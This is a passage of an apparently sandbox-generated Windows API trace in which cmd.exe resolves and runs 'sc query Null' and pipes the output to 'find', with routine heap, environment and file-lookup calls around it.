_wcsicmp (_String1="IF", _String2="find") returned 3 [0174.753] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0174.753] _wcsicmp (_String1="REM", _String2="find") returned 12 [0174.753] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb9e0 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e0cf0 [0174.754] _tell (_FileHandle=3) returned 2311 [0174.754] _close (_FileHandle=3) returned 0 [0174.754] GetProcessHeap () returned 0x19a8f1e0000 [0174.754] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f92c0 [0174.754] _pipe (in: _PtHandles=0x19a8f1f92d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f92d0) returned 0 [0174.755] _dup (_FileHandle=1) returned 5 [0174.755] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0174.755] _close (_FileHandle=4) returned 0 [0174.755] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0174.755] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0174.755] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0174.755] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0174.755] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0174.755] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0174.755] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0174.755] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0174.755] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0174.755] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0174.755] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0174.755] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0174.755] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0174.755] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0174.755] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0174.756] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0174.756] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0174.756] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0174.756] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0174.756] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0174.756] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0174.756] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0174.756] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0174.756] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0174.756] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0174.756] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0174.756] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0174.756] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0174.756] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0174.756] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0174.756] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0174.756] _wcsicmp (_String1="sc", _String2="START") returned -17 [0174.756] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0174.756] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0174.756] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0174.756] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0174.756] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0174.756] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0174.756] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0174.756] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0174.757] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0174.757] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0174.757] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0174.757] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0174.757] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0174.757] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0174.757] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0174.757] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0174.757] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0174.757] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0174.757] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0174.757] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0174.757] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0174.757] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0174.757] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0174.757] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0174.757] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0174.757] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0174.757] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0174.757] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0174.757] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0174.757] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0174.757] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0174.757] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0174.758] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0174.758] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0174.758] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0174.758] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0174.758] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0174.758] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0174.758] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0174.758] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0174.758] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0174.758] _wcsicmp (_String1="sc", _String2="START") returned -17 [0174.758] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0174.758] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0174.758] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0174.758] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0174.758] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0174.758] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0174.758] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0174.758] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0174.758] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0174.758] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0174.758] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0174.758] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0174.758] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0174.758] GetProcessHeap () returned 0x19a8f1e0000 [0174.759] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fa1a0 [0174.759] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0174.759] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0174.759] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0174.759] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0174.759] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0174.759] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0174.759] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0174.759] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0174.759] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0174.759] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0174.759] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0174.759] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0174.759] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0174.759] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0174.759] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0174.759] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0174.759] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0174.759] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0174.759] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0174.759] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0174.759] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0174.759] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0174.759] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0174.759] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0174.760] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0174.760] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0174.760] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0174.760] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0174.760] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0174.760] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0174.760] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0174.760] _wcsicmp (_String1="sc", _String2="START") returned -17 [0174.760] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0174.760] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0174.760] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0174.760] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0174.760] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0174.760] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0174.760] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0174.760] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0174.760] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0174.760] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0174.760] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0174.760] GetProcessHeap () returned 0x19a8f1e0000 [0174.760] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea4b0 [0174.760] SetErrorMode (uMode=0x0) returned 0x0 [0174.761] SetErrorMode (uMode=0x1) returned 0x0 [0174.761] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea4c0, lpFilePart=0x43f9efeb00 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efeb00*="system32") returned 0x13 [0174.761] SetErrorMode (uMode=0x0) returned 0x1 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea4b0, Size=0x3e) returned 0x19a8f1ea4b0 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x3e [0174.761] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0174.761] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1e5e10 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1e5f10 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f10, Size=0xf0) returned 0x19a8f1e5f10 [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.761] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f10) returned 0xf0 [0174.761] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0174.761] GetProcessHeap () returned 0x19a8f1e0000 [0174.762] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e6010 [0174.762] GetProcessHeap () returned 0x19a8f1e0000 [0174.762] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e6010, Size=0x88) returned 0x19a8f1e6010 [0174.762] GetProcessHeap () returned 0x19a8f1e0000 [0174.762] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e6010) returned 0x88 [0174.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*" (normalized: "c:\\windows\\system32\\sc.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0x19a8f1f8ca0 [0174.762] GetProcessHeap () returned 0x19a8f1e0000 [0174.762] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e6bb0, Size=0x8) returned 0x19a8f1e6bb0 [0174.762] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0174.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM" (normalized: "c:\\windows\\system32\\sc.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0xffffffffffffffff [0174.763] GetLastError () returned 0x2 [0174.763] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE" (normalized: "c:\\windows\\system32\\sc.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0x19a8f1f8ca0 [0174.763] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0174.763] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0174.763] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0174.763] GetProcessHeap () returned 0x19a8f1e0000 [0174.763] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb920 [0174.763] GetProcessHeap () returned 0x19a8f1e0000 [0174.763] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1ea500 [0174.763] GetProcessHeap () returned 0x19a8f1e0000 [0174.763] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0a30 [0174.764] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.764] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea720 [0174.764] SetErrorMode (uMode=0x0) returned 0x0 [0174.764] SetErrorMode (uMode=0x1) returned 0x0 [0174.764] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea730, lpFilePart=0x43f9efe890 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe890*="system32") returned 0x13 [0174.764] SetErrorMode (uMode=0x0) returned 0x1 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.764] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea720, Size=0x3e) returned 0x19a8f1ea720 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.764] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea720) returned 0x3e [0174.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0174.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.764] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1ea770 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.764] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1ea870 [0174.764] GetProcessHeap () returned 0x19a8f1e0000 [0174.765] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea870, Size=0xf0) returned 0x19a8f1ea870 [0174.765] GetProcessHeap () returned 0x19a8f1e0000 [0174.765] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea870) returned 0xf0 [0174.765] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0174.765] GetProcessHeap () returned 0x19a8f1e0000 [0174.765] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1ea970 [0174.765] GetProcessHeap () returned 0x19a8f1e0000 [0174.765] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea970, Size=0x88) returned 0x19a8f1ea970 [0174.765] GetProcessHeap () returned 0x19a8f1e0000 [0174.765] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea970) returned 0x88 [0174.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*" (normalized: "c:\\windows\\system32\\sc.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0x19a8f1f86a0 [0174.765] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0174.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM" (normalized: "c:\\windows\\system32\\sc.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0xffffffffffffffff [0174.766] GetLastError () returned 0x2 [0174.766] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE" (normalized: "c:\\windows\\system32\\sc.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0x19a8f1f86a0 [0174.766] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0174.767] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0174.767] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0174.767] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeb70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efea90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe990 | out: lpAttributeList=0x43f9efea90, lpSize=0x43f9efe990) returned 1 [0174.767] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efea90, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe97c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efea90, lpPreviousValue=0x0) returned 1 [0174.767] GetStartupInfoW (in: lpStartupInfo=0x43f9efea20 | out: lpStartupInfo=0x43f9efea20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0174.767] GetProcessHeap () returned 0x19a8f1e0000 [0174.768] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb7d0 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.769] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0174.769] GetProcessHeap () returned 0x19a8f1e0000 [0174.770] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7d0) returned 1 [0174.770] GetProcessHeap () returned 0x19a8f1e0000 [0174.770] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1eca20 [0174.770] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0174.773] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc query Null ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x43f9efe9b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc query Null ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe998 | out: lpCommandLine="sc query Null ", lpProcessInformation=0x43f9efe998*(hProcess=0x98, hThread=0x94, dwProcessId=0x139c, dwThreadId=0x1398)) returned 1 [0174.791] CloseHandle (hObject=0x94) returned 1 [0174.791] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0174.791] GetProcessHeap () returned 0x19a8f1e0000 [0174.792] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0174.792] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0174.792] GetProcessHeap () returned 0x19a8f1e0000 [0174.792] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb16) returned 0x19a8f1eeb50 [0174.792] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb16 | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0174.792] FreeEnvironmentStringsA (penv="=") returned 1 [0174.792] GetProcessHeap () returned 0x19a8f1e0000 [0174.792] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca20) returned 1 [0174.792] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efea90 | out: lpAttributeList=0x43f9efea90) [0174.792] _get_osfhandle (_FileHandle=3) returned 0x84 [0174.792] DuplicateHandle (in: hSourceProcessHandle=0x98, hSourceHandle=0x84, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0174.793] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0174.793] _close (_FileHandle=5) returned 0 [0174.793] _dup (_FileHandle=0) returned 4 [0174.793] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0174.793] _close (_FileHandle=3) returned 0 [0174.793] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0174.793] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0174.793] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0174.793] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0174.793] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0174.793] _wcsicmp (_String1="find", _String2="CD") returned 3 [0174.793] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0174.793] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0174.793] _wcsicmp (_String1="find", _String2="REN") returned -12 [0174.793] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0174.793] _wcsicmp (_String1="find", _String2="SET") returned -13 [0174.793] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0174.794] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0174.794] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0174.794] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0174.794] _wcsicmp (_String1="find", _String2="MD") returned -7 [0174.794] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0174.794] _wcsicmp (_String1="find", 